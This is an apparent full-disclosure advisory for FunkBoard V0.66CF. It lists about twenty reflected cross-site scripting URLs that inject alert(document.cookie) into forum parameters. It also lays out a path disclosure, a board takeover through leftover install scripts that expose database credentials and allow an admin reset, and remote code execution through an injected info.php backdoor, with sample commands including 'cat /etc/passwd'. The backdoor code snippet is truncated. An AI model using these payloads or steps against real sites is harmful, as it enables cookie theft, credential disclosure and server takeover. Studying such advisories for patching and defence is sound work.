FunkBoard V0.66CF (possibly prior versions) cross site scripting, possible database username/password disclosure & board takeover, possible remote code execution software: author site: http://www.[path_to_funkboard].co.uk/ xss: http://[target]/[path_to_funkboard]/editpost.php?fbusername=">alert(document.cookie) http://[target]/[path_to_funkboard]/editpost.php?fbpassword=">alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbpassword=">alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbusername=">alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbusername=">alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbpassword=">alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&subject=">alert(document.cookie) http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbusername=">alert(document.cookie) http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbpassword=">alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbusername=">alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbpassword=">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fbusername=">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fmail=">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?www=">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?icq=">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?yim=">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?location=">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sex=">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?interebbies=">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sig=alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?aim=">alert(document.cookie) path disclosure: http://[target]/[path_to_funkboard]/images/forums.php database username & password disclosure: during installation is not remembered to delete the mysql_install script and the installation do not delete it, usually: http://[target]/[path]/admin/mysql_install.php or http://[target]/[path]/admin/pg_install.php there, a user can see database clear text username & password ... Then, the script let the user proceed to the next page, where he can reset funkboard administator username & password. Now the script faults, because some tables exist, etc. So user can go back and setting a new database name for installation, guessing among other installations on the server... Once Installation succeeded he can set new admin username e password then login at this page: http://[target]/[path]/[path_to_funkboard]/admin/index.php Now the user can edit templates and append some evil javascript code. remote code execution: look at this code in mysql_install.php : $infoout = " so, you have a backdoor on target system... you can launch commands by this urls: http://localhost:30/funkboard/info.php?command=ls%20-la to list directories... http://localhost:30/funkboard/info.php?command=cat%20/etc/passwd to see /etc/passwd file